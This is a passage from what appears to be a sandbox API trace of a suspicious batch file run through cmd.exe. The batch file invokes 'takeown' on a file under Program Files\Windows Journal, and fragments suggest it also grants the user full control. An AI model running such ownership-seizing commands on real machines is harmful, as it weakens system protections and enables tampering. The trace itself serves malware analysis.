_String2="Path=C:", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0286.437] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0286.437] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xa0ef18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa0ef64 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessInformation=0xa0ef64*(hProcess=0xb0, hThread=0xb8, dwProcessId=0xde8, dwThreadId=0x4c0)) returned 1 [0286.445] CloseHandle (hObject=0xb8) returned 1 [0286.445] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0286.445] GetEnvironmentStringsW () returned 0xdeb2f0* [0286.445] FreeEnvironmentStringsA (penv="=") returned 1 [0286.445] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0289.778] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0xa0eefc | out: lpExitCode=0xa0eefc*=0x0) returned 1 [0289.778] CloseHandle (hObject=0xb0) returned 1 [0289.778] _vsnwprintf (in: _Buffer=0xa0efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0xa0ef04 | out: _Buffer="00000000") returned 8 [0289.778] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0289.778] GetEnvironmentStringsW () returned 0xdeb2f0* [0289.778] FreeEnvironmentStringsA (penv="=") returned 1 [0289.778] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0289.778] GetEnvironmentStringsW () returned 0xdeb2f0* [0289.779] FreeEnvironmentStringsA (penv="=") returned 1 [0289.779] DeleteProcThreadAttributeList (in: lpAttributeList=0xa0ef90 | out: lpAttributeList=0xa0ef90) [0289.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.779] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0289.893] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.893] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0289.893] _get_osfhandle (_FileHandle=0) returned 0x38 [0289.893] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0289.893] SetConsoleInputExeNameW () returned 0x1 [0289.893] GetConsoleOutputCP () returned 0x1b5 [0289.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0289.893] SetThreadUILanguage (LangId=0x0) returned 0x409 [0289.894] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa0f724, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0289.894] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0289.894] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.894] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0289.894] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.894] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0289.894] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa0f6f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xa0f6f4*=0xb3, lpOverlapped=0x0) returned 1 [0289.895] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0289.895] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0289.895] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.895] GetFileType (hFile=0xb0) returned 0x1 [0289.895] _get_osfhandle (_FileHandle=3) returned 0xb0 [0289.895] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0289.895] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", nBufferLength=0x208, lpBuffer=0xa0ee70, lpFilePart=0xa0ee34 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFilePart=0xa0ee34*="MSPVWCTL.DLL.mui") returned 0x37 [0289.895] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0289.895] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0289.895] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0289.895] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0289.895] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0289.895] _wcsnicmp (_String1="WIA843~1", _String2="Windows Journal", _MaxCount=0xf) returned -13 [0289.895] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0289.895] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0289.896] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0289.896] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0289.896] _wcsicmp (_String1="set", _String2=")") returned 74 [0289.896] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0289.896] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0289.896] _wcsicmp (_String1="IF", _String2="set") returned -10 [0289.896] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0289.896] _wcsicmp (_String1="REM", _String2="set") returned -1 [0289.896] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0289.896] _tell (_FileHandle=3) returned 63 [0289.896] _close (_FileHandle=3) returned 0 [0289.896] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f4b8 | out: _Buffer="\r\n") returned 2 [0289.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.896] GetFileType (hFile=0x3c) returned 0x2 [0289.896] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0289.897] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f490 | out: lpMode=0xa0f490) returned 1 [0289.897] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.897] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f4a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f4a8*=0x2) returned 1 [0289.897] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0289.897] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0289.897] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xa0f4b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0289.897] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xa0f4b4 | out: _Buffer=">") returned 1 [0289.897] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.897] GetFileType (hFile=0x3c) returned 0x2 [0289.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0289.897] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f494 | out: lpMode=0xa0f494) returned 1 [0290.059] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.059] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa0f4ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xa0f4ac*=0x1e) returned 1 [0290.284] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.284] GetFileType (hFile=0x3c) returned 0x2 [0290.284] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.285] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f734 | out: lpMode=0xa0f734) returned 1 [0290.365] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.365] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdf83a8*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa0f74c, lpReserved=0x0 | out: lpBuffer=0xdf83a8*, lpNumberOfCharsWritten=0xa0f74c*=0x3) returned 1 [0290.608] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f754 | out: _Buffer=" FN=\"MSPVWCTL.DLL.mui\" ") returned 23 [0290.608] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.608] GetFileType (hFile=0x3c) returned 0x2 [0290.608] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.608] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0290.618] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.618] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x17) returned 1 [0290.653] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f768 | out: _Buffer="\r\n") returned 2 [0290.654] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.654] GetFileType (hFile=0x3c) returned 0x2 [0290.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.654] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f740 | out: lpMode=0xa0f740) returned 1 [0290.667] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.668] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f758, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f758*=0x2) returned 1 [0290.876] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0290.876] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0290.876] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0290.876] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0290.876] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0290.876] _wcsicmp (_String1="set", _String2="CD") returned 16 [0290.876] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0290.876] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0290.876] _wcsicmp (_String1="set", _String2="REN") returned 1 [0290.876] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0290.876] _wcsicmp (_String1="set", _String2="SET") returned 0 [0290.876] GetConsoleTitleW (in: lpConsoleTitle=0xa0f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.954] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0290.954] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0290.954] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0290.954] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0290.954] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0290.955] _wcsicmp (_String1="set", _String2="CD") returned 16 [0290.955] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0290.955] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0290.955] _wcsicmp (_String1="set", _String2="REN") returned 1 [0290.955] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0290.955] _wcsicmp (_String1="set", _String2="SET") returned 0 [0290.955] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0290.955] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0290.955] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0290.955] SetEnvironmentVariableW (lpName="FN", lpValue="\"MSPVWCTL.DLL.mui\"") returned 1 [0290.955] GetEnvironmentStringsW () returned 0xdeb2f0* [0290.955] FreeEnvironmentStringsA (penv="=") returned 1 [0290.955] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.955] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0291.238] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.238] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0291.279] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.279] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0291.703] SetConsoleInputExeNameW () returned 0x1 [0291.703] GetConsoleOutputCP () returned 0x1b5 [0291.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0291.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.335] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa0f724, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0292.335] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0292.335] _get_osfhandle (_FileHandle=3) returned 0xb0 [0292.335] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0292.336] _get_osfhandle (_FileHandle=3) returned 0xb0 [0292.336] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0292.336] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa0f6f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xa0f6f4*=0xa3, lpOverlapped=0x0) returned 1 [0292.336] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0292.336] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0292.336] _get_osfhandle (_FileHandle=3) returned 0xb0 [0292.336] GetFileType (hFile=0xb0) returned 0x1 [0292.336] _get_osfhandle (_FileHandle=3) returned 0xb0 [0292.336] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0292.336] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0xa0ee70, lpFilePart=0xa0ee34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xa0ee34*="vRnqNMBW.bat") returned 0x2a [0292.336] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0292.336] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0292.336] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0292.336] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0292.336] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0292.336] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0292.337] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0292.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0xa0eb78 | out: lpFindFileData=0xa0eb78) returned 0xde0b68 [0292.337] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0292.337] _wcsicmp (_String1="cd", _String2=")") returned 58 [0292.337] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0292.337] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0292.337] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0292.337] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0292.337] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0292.337] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0292.337] _tell (_FileHandle=3) returned 78 [0292.337] _close (_FileHandle=3) returned 0 [0292.338] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f4b8 | out: _Buffer="\r\n") returned 2 [0292.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.338] GetFileType (hFile=0x3c) returned 0x2 [0292.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.338] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f490 | out: lpMode=0xa0f490) returned 1 [0292.906] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.906] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f4a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f4a8*=0x2) returned 1 [0293.121] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0293.121] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.121] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xa0f4b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0293.121] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xa0f4b4 | out: _Buffer=">") returned 1 [0293.121] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.121] GetFileType (hFile=0x3c) returned 0x2 [0293.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.122] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f494 | out: lpMode=0xa0f494) returned 1 [0293.221] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.221] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa0f4ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xa0f4ac*=0x1e) returned 1 [0293.406] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.406] GetFileType (hFile=0x3c) returned 0x2 [0293.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.406] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f734 | out: lpMode=0xa0f734) returned 1 [0293.667] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.667] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdf83a8*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f74c, lpReserved=0x0 | out: lpBuffer=0xdf83a8*, lpNumberOfCharsWritten=0xa0f74c*=0x2) returned 1 [0294.088] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f754 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0294.088] _get_osfhandle (_FileHandle=1) returned 0x3c [0294.088] GetFileType (hFile=0x3c) returned 0x2 [0294.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0294.088] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0294.621] _get_osfhandle (_FileHandle=1) returned 0x3c [0294.621] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x25) returned 1 [0295.309] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f768 | out: _Buffer="\r\n") returned 2 [0295.309] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.309] GetFileType (hFile=0x3c) returned 0x2 [0295.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0295.309] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f740 | out: lpMode=0xa0f740) returned 1 [0295.957] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.957] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f758, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f758*=0x2) returned 1 [0296.072] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0296.072] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0296.072] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0296.072] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0296.072] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0296.072] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0296.072] GetConsoleTitleW (in: lpConsoleTitle=0xa0f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.225] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0296.225] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0296.225] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0296.225] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0296.225] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0296.225] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0296.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.226] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xa0f090, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xa0f088, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa0f088*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0296.226] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0296.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa0ee34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.227] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xa0ee34, lpFilePart=0xa0ee2c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xa0ee2c*=0x0) returned 0x1e [0296.227] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.633] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa0ebb0 | out: lpFindFileData=0xa0ebb0) returned 0xde0b68 [0296.633] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0296.634] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xa0ebb0 | out: lpFindFileData=0xa0ebb0) returned 0xde0b68 [0296.634] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0296.634] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0296.634] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xa0ebb0 | out: lpFindFileData=0xa0ebb0) returned 0xde0b68 [0296.634] FindClose (in: hFindFile=0xde0b68 | out: 